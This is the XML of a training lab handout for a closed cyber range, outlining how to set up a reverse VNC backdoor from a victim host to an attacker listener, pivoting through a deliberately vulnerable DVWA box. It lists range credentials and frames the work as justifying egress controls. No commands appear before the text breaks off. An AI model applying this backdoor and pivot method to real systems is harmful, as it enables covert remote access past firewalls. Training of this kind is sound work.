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22DAE" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000" w:rsidP="00A40F33">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>TINY CYBERLAB (TCL) · RANGE LAB SERIES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9F4CCC" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000" w:rsidP="00A40F33">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>TCL 16 — How to Set Up a Reverse VNC Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C51E6D5" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000" w:rsidP="00A40F33">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Cipher Logistics Security Assessment Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540DFE54" w14:textId="77777777" w:rsidR="00A40F33" w:rsidRDefault="00A40F33" w:rsidP="00A40F33">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11661C9E" w14:textId="77777777" w:rsidR="00A40F33" w:rsidRDefault="00A40F33" w:rsidP="00A40F33">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510C760D" w14:textId="77777777" w:rsidR="00A40F33" w:rsidRDefault="00A40F33" w:rsidP="00A40F33">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D11401D" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. Introduction &amp; Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D55DFF" w14:textId="77777777" w:rsidR="00EA5F74"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16 focuses on: contrasting a forward VNC connection with a reverse (outbound-initiated) VNC backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983C1B9" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EABB7FD" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Start a VNC server on the victim and connect to it the normal (forward) way from the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE4053" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Explain why an inbound-blocking firewall would stop that forward connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B67AB4" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Start a listening VNC viewer on the attacker and initiate a reverse connection from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E4153" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Contrast the forward and reverse connections and recommend egress controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D099C" w14:textId="77777777" w:rsidR="00EA5F74"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EA5F74" w14:paraId="2FD6EC3E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="56167432" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="367489CA" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role in this lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F74" w14:paraId="4F8CBE69" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6331C28A" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TightVNC / vncserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="070114EF" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Serving a remote desktop session — CEH “Trojans and Other Attacks” domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F74" w14:paraId="6086F256" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="657194B7" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>vncviewer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="516310C3" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Connecting to (and listening for) VNC sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F74" w14:paraId="489F1360" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="340BC3DB" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>x11vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="426570A4" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Initiating the outbound reverse connection from the inside host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19B734E0" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. NIST/NICE Role Alignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2474378A" w14:textId="77777777" w:rsidR="00EA5F74"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EA5F74" w14:paraId="2AFE4300" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="19836B86" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Work role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="61C0A49B" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="3677BF9A" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>How this lab fulfills it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F74" w14:paraId="1E7D35C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="775D187C" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="498143CF" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PD-WRL-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F13324A" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Reverse remote-access channels are a core persistence and command-and-control technique; being able to demonstrate one is how this role justifies egress filtering and outbound monitoring to a client.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4484AE31" w14:textId="77777777" w:rsidR="00EA5F74"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EA5F74" w14:paraId="4C0D4ED2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="311B6FA9" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="0497626B" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="3EA742F1" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="31BFE780" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>OS / Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="2A20EC13" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F74" w14:paraId="234B8E02" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3595B7CA" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB890A1" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attacker workstation (Kali + XFCE/RDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02915EF0" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10.10.0.10 (internet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DF3C6A0" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C17ACC3" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>root / cyberrange</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F74" w14:paraId="76CC95D8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24939C0C" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>metasploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD65079" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerable Linux </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(LAN, via pivot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31DA232D" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10.30.0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18843A6F" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Metasploitable 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23C279EF" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">msfadmin / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="219D7F60" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE0714F" wp14:editId="5667DFC8">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322C3BC0" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 1 — Tiny CyberLab (TCL) topology (all labs share this environment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FCFF3A" w14:textId="77777777" w:rsidR="00EA5F74"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EA5F74" w14:paraId="7DDD42FB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEE7F1"/>
          </w:tcPr>
          <w:p w14:paraId="35D8430A" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>Reaching the target in this lab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4490B0D9" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>This lab's target, metasploitable (10.30.0.20), is on the internal LAN. The firewall does not forward to the LAN and the attacker has no direct route to it, so you must PIVOT through the dual-homed dvwa (10.20.0.12 in the DMZ, 10.30.0.12 on the LAN). DVWA is deliberately vulnerable (its Command Injection page gives you code execution on that box), which is the intended foothold; from there you reach the LAN. See “Pivoting to the LAN” in the student quickstart. Where a full pivot is beyond your class, treat reaching the LAN host as the bonus objective and complete the lab's technique against a DMZ host or with offline data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C5F8255" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6717C6FA" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>By the end of this lab, you will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16394555" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Start a VNC server on the victim and connect to it the normal (forward) way from the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E257F8F" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Explain why an inbound-blocking firewall would stop that forward connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9B54D5" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Start a listening VNC viewer on the attacker and initiate a reverse connection from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35125EF3" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Contrast the forward and reverse connections and recommend egress controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD15597" w14:textId="77777777" w:rsidR="00EA5F74"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EA5F74" w14:paraId="16199E6B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE9E4"/>
          </w:tcPr>
          <w:p w14:paraId="25CD3602" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Case File — Cipher Logistics Engagement</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C9DAE63" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>“You showed the file channel with Netcat,” Nadia says. “Now show the interactive one. If an attacker wants Victor's actual desktop, an inbound firewall won't stop them — because the compromised machine will reach out, not in.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5837E6A0" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>She wants the contrast made explicit. “Do it the obvious way first. Then flip it — have the inside host dial out to your listener — and explain why the same firewall that would block the first waves the second through. That side-by-side is the finding.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73978015" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Your task: connect to a VNC server the normal way, then establish a reverse VNC connection from the victim out to a listener on the attacker container.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FDF1ADA" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
